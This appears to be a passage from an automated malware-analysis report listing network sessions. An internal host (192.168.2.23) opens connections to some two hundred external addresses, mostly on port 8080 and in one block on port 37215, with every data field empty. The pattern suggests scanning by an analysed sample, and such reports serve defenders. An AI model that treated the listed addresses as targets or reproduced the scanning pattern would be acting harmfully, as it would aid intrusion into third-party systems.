                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28957192.168.2.2350238216.33.234.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28958192.168.2.2344930189.176.225.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28959192.168.2.2336784163.38.200.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28960192.168.2.235253878.219.130.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28961192.168.2.235636299.221.53.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28962192.168.2.235278840.208.157.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28963192.168.2.2341400182.242.2.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28964192.168.2.234929449.97.43.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28965192.168.2.233370059.65.23.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28966192.168.2.2354826186.188.33.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28967192.168.2.2359864156.27.56.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28968192.168.2.233923069.32.198.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28969192.168.2.235741090.82.36.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28970192.168.2.2340578118.246.146.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28971192.168.2.23563861.38.9.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28972192.168.2.233762042.34.255.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28973192.168.2.2337360175.28.64.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28974192.168.2.2360268122.237.68.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28975192.168.2.2357624126.240.114.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28976192.168.2.2354128208.191.201.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28977192.168.2.2360854186.60.227.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28978192.168.2.2360048172.141.67.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28979192.168.2.235509882.225.255.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28980192.168.2.2357534154.249.16.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28981192.168.2.2356582100.32.165.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28982192.168.2.2360110207.43.83.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28983192.168.2.2337736166.74.209.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28984192.168.2.234339835.46.30.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28985192.168.2.235744075.181.152.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28986192.168.2.233327293.74.172.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28987192.168.2.233651236.48.199.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28988192.168.2.2357518195.105.238.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28989192.168.2.235194084.178.45.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28990192.168.2.233547073.240.101.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28991192.168.2.233718273.115.22.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28992192.168.2.236062639.220.61.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28993192.168.2.2344808104.221.241.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28994192.168.2.235980074.246.87.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28995192.168.2.2345260129.28.8.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28996192.168.2.2340532105.145.101.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28997192.168.2.2350748116.239.27.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28998192.168.2.2353312106.168.249.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28999192.168.2.2358016191.6.199.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29000192.168.2.2338418124.252.75.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29001192.168.2.2358372123.208.252.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29002192.168.2.2349688200.82.226.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29003192.168.2.2355430118.147.172.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29004192.168.2.234103073.228.82.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29005192.168.2.235019073.214.94.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29006192.168.2.2357992105.86.206.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29007192.168.2.2336488158.90.136.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29008192.168.2.2335768134.14.30.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29009192.168.2.235381025.119.96.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29010192.168.2.2344004110.179.117.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29011192.168.2.2338382197.250.201.14037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29012192.168.2.2352494176.162.32.9437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29013192.168.2.235725441.53.98.19937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29014192.168.2.234102441.49.179.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29015192.168.2.235780041.121.177.22537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29016192.168.2.2344608157.242.163.4937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29017192.168.2.235414041.174.12.3437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29018192.168.2.234459241.41.119.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29019192.168.2.234319441.123.178.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29020192.168.2.234720041.67.172.14137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29021192.168.2.2353044157.152.53.5137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29022192.168.2.2353532157.182.13.11337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29023192.168.2.234038441.210.28.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29024192.168.2.2337144157.69.18.11937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29025192.168.2.2343604197.63.103.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29026192.168.2.2343318157.79.152.19137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29027192.168.2.233979641.222.3.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29028192.168.2.235574041.170.157.15137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29029192.168.2.2341830162.70.35.19337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29030192.168.2.2359248157.240.4.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29031192.168.2.2343804157.189.105.13537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29032192.168.2.2344752197.2.236.20137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29033192.168.2.234792090.248.244.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29034192.168.2.2339430161.127.50.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29035192.168.2.2360862189.187.216.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29036192.168.2.233999850.60.184.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29037192.168.2.2344128116.54.60.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29038192.168.2.2356122161.54.137.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29039192.168.2.235236850.49.237.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29040192.168.2.2349422159.83.154.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29041192.168.2.2349202161.74.94.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29042192.168.2.2355288141.27.11.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29043192.168.2.2358184143.136.111.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29044192.168.2.2345400209.13.67.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29045192.168.2.235677069.156.160.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29046192.168.2.2353418102.221.50.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29047192.168.2.2349748160.35.103.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29048192.168.2.235600625.157.216.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29049192.168.2.2360400124.158.229.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29050192.168.2.235030431.130.68.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29051192.168.2.23349669.51.54.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29052192.168.2.234810038.243.28.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29053192.168.2.2359122138.65.1.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29054192.168.2.234963844.5.130.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29055192.168.2.235642053.18.121.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29056192.168.2.234072859.65.172.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29057192.168.2.2341094201.251.0.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29058192.168.2.2347986200.94.63.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29059192.168.2.2334118133.100.70.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29060192.168.2.2333520186.228.227.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29061192.168.2.233760878.246.41.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29062192.168.2.2356496180.207.140.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29063192.168.2.234480491.132.230.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29064192.168.2.2347520125.70.169.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29065192.168.2.234905239.140.72.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29066192.168.2.2356650126.181.94.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29067192.168.2.2343890116.101.231.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29068192.168.2.2345590120.216.230.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29069192.168.2.2338688219.99.17.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29070192.168.2.2339978206.4.252.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29071192.168.2.2342178202.202.119.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29072192.168.2.2343766129.166.157.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29073192.168.2.234259261.96.7.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29074192.168.2.2340236153.217.103.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29075192.168.2.23556209.253.189.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29076192.168.2.2334276143.247.213.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29077192.168.2.2344256198.210.10.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29078192.168.2.2336372101.4.108.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29079192.168.2.2356318131.89.213.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29080192.168.2.2342036212.97.128.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29081192.168.2.235211479.173.152.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29082192.168.2.2341524155.4.46.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29083192.168.2.233828835.201.65.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29084192.168.2.235680478.136.113.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29085192.168.2.233959258.138.159.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29086192.168.2.2353396213.140.211.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29087192.168.2.2360976100.40.166.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29088192.168.2.2334062203.143.84.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29089192.168.2.2359676187.73.96.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29090192.168.2.233863654.192.159.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29091192.168.2.2356106220.1.133.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29092192.168.2.2359014108.169.175.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29093192.168.2.234672442.163.112.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29094192.168.2.233287034.1.240.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29095192.168.2.2345704159.104.246.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29096192.168.2.233721617.246.31.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29097192.168.2.2341418217.209.93.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29098192.168.2.2357770179.61.58.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29099192.168.2.2344096183.119.16.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29100192.168.2.2356904218.46.251.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29101192.168.2.233351838.91.131.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29102192.168.2.2348354154.105.73.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29103192.168.2.234611490.228.197.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29104192.168.2.235513814.130.232.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29105192.168.2.2338156150.87.33.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29106192.168.2.2334646210.127.164.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29107192.168.2.2337162192.83.68.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29108192.168.2.2350516193.195.46.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29109192.168.2.234398875.5.224.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29110192.168.2.23535061.233.91.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29111192.168.2.2353904192.57.218.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29112192.168.2.234892048.227.23.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29113192.168.2.236078642.34.195.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29114192.168.2.234334648.152.255.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29115192.168.2.2360738136.201.98.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29116192.168.2.235861232.11.68.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29117192.168.2.2357196109.156.67.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29118192.168.2.2353468202.24.53.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29119192.168.2.234631462.181.220.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29120192.168.2.2343160190.85.57.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29121192.168.2.234026613.35.24.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29122192.168.2.234781854.28.4.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29123192.168.2.235155077.215.33.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29124192.168.2.2349508123.214.168.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29125192.168.2.234655848.222.96.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29126192.168.2.233758282.207.4.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29127192.168.2.234480018.150.228.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29128192.168.2.2359578104.161.121.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29129192.168.2.2337670217.140.56.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29130192.168.2.2333162138.11.182.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29131192.168.2.233981698.6.129.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29132192.168.2.236009859.139.78.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29133192.168.2.235306849.38.99.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29134192.168.2.2352726123.27.11.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29135192.168.2.234558496.62.12.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29136192.168.2.2360918196.129.167.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29137192.168.2.2340672154.84.84.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29138192.168.2.234221467.5.193.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29139192.168.2.2346984193.246.99.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29140192.168.2.2335410203.141.140.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29141192.168.2.2342090102.17.218.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29142192.168.2.234325636.220.74.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29143192.168.2.233428812.94.156.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29144192.168.2.235926287.145.237.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29145192.168.2.233775214.25.241.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29146192.168.2.234673445.78.65.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29147192.168.2.2356400126.228.49.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29148192.168.2.234526417.53.223.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29149192.168.2.2356556169.108.95.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29150192.168.2.234533292.79.35.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29151192.168.2.2354488139.235.81.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29152192.168.2.2347258118.166.78.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29153192.168.2.234226672.51.217.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29154192.168.2.234042268.73.249.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29155192.168.2.2357190124.41.0.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29156192.168.2.2357092110.219.15.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29157192.168.2.233912670.11.14.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29158192.168.2.2348220137.188.19.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29159192.168.2.2346994160.60.158.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29160192.168.2.234763088.19.183.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29161192.168.2.234837813.25.1.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29162192.168.2.2344580198.208.156.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29163192.168.2.235677248.103.103.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29164192.168.2.23551802.112.40.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29165192.168.2.2337056220.248.63.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29166192.168.2.2343320132.146.169.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
